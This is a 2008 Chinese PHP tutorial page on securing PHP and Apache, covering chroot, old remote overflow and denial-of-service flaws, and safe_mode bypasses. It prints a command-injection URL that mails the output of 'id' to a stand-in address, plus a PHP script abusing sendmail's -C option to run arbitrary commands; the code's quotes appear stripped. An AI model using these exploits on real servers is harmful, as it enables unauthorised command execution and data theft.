|
论坛登录
|
游客访问
|
免费注册
|
忘记密码
RSS订阅
网站地图
高级搜索
收藏本站
首页
|
新闻咨询
|
PHP基础
|
PHP高级编程
|
数据库
|
服务器
|
网页制作
|
PHPCMS专区
|
源码共享
|
书辑下载
|
休闲茶馆
|
PHP专题
当前位置:
主页
>>
PHP基础
>>
基础文章
>> 文章内容
PHP安全配置之实现安全的两个重点
[
收藏此页
]
[打印本页]
来源:互联网 作者:未知 发布时间:2008-01-16
一、Web服务器安全
PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
都是针对Win32平台,所以需要在chroot环境下调整好sendmail。
二、PHP本身问题
1、远程溢出
PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高.
2、远程拒绝服务
PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。
phperz~com
3、safe_mode绕过漏洞
还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:
执行如下的URL:
http://foo.com/evil.php?bar=;/usr/bin/id mail evil@domain.com
这将id执行的结果发送给evil@domain.com。
对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:
#注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样:
$script=/tmp/script123;
$cf=/tmp/cf123;
$fd = fopen($cf, w);
fwrite($fd, OQ/tmp
Sparse=0
R$* . chr(9) . $#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script);
fclose($fd);
$fd = fopen($script, w);
fwrite($fd, rm -f $script $cf; );
www.phperz.com
fwrite($fd, $cmd);
fclose($fd);
mail(nobody, , , , -C$cf);
?>
还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。
[收藏此页]
[打印本页]
[返回顶部]
上一篇:
php中的安全模式是指的什么?
下一篇:
PHP环境安全配置教程
输入您的搜索字词
提交搜索表单
Web
www.phperz.com
相关文章
·
PHP的日期时间函数date()详解
·
一个完整、安全的用户登录系统
·
发布一个最强的PHP通用分页类
·
smarty的简单分页代码
·
php中Cookie介绍及其使用
·
浅谈PHP+MYSQL身份验证的方法
·
php目录,文件操作详谈
·
浅谈php用户身份认证
·
Discuz!登陆验证Cookie机制分析
·
PHP数组的定义、初始化和数组元素的显示
发表评论
全部评论(
0
条)
用户名:
(
新注册
) 密码:
验证码:
·不能超过500字,需审核后才会公布,请自觉遵守互联网相关政策法规
·本站发布内容均为客观表达作者观点,不代表站长站立场,请勿攻击和漫骂
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
§
最新评论
:
站内搜索
热门搜索
基础
mysql
url
adodb
高级搜索
网站地图
站长工具
IP查询
收藏本站
热点文章
·
入门级PHP程序员面试题(总100分/47题), 看
·
PHP笔试题二
·
PHP获取仿客IP地址的函数
·
PHP笔试题一
·
php实现中文分词
·
PHP页面重定向的三种方法
·
PHPMailer安装及简单实例
·
php日历类
·
PHPMailer邮件类的使用教程
·
Php+Mysql注入攻击详解(1)
·
Php+Mysql注入攻击详解(2)
·
如何用正则表达式来表示中文
·
AJAX技术在PHP开发中的简单应用
·
Php+Mysql注入攻击详解(4)
·
php获取远程图片并把它保存到本地
随机推荐
·
PHP中$_SERVER的详细解释
·
用PHP连mysql和oracle数据库性能比较
·
关于Php后门的隐藏技巧测试
·
PHP常用库函数(6)
·
PHP常用库函数(3)
·
PHP中路径问题的解决方案
·
PHP生成静态页面详解
·
php使用文本统计在线人数
·
PHP+MYSQL编程留言本实例(一)
·
php取得客户端信息(浏览器/IP/操作系统)代
·
在PHP中使用与Perl兼容的正则表达式
·
php的content-type=text/html问题
·
Php+Mysql注入攻击详解(3)
·
Discuz!论坛实现PHP代码高亮
·
php获取远程图片并把它保存到本地
·
php操作php文件
·
PHP版的捕捉搜索引擎蜘蛛爬行的代码
·
php+mysql开发经验谈
网站首页
|
网站地图
|
高级搜索
|
RSS订阅
PHP程序员站 Copyright © 2007,PHPERZ.COM All Rights Reserved
粤ICP备07503606号
联系站长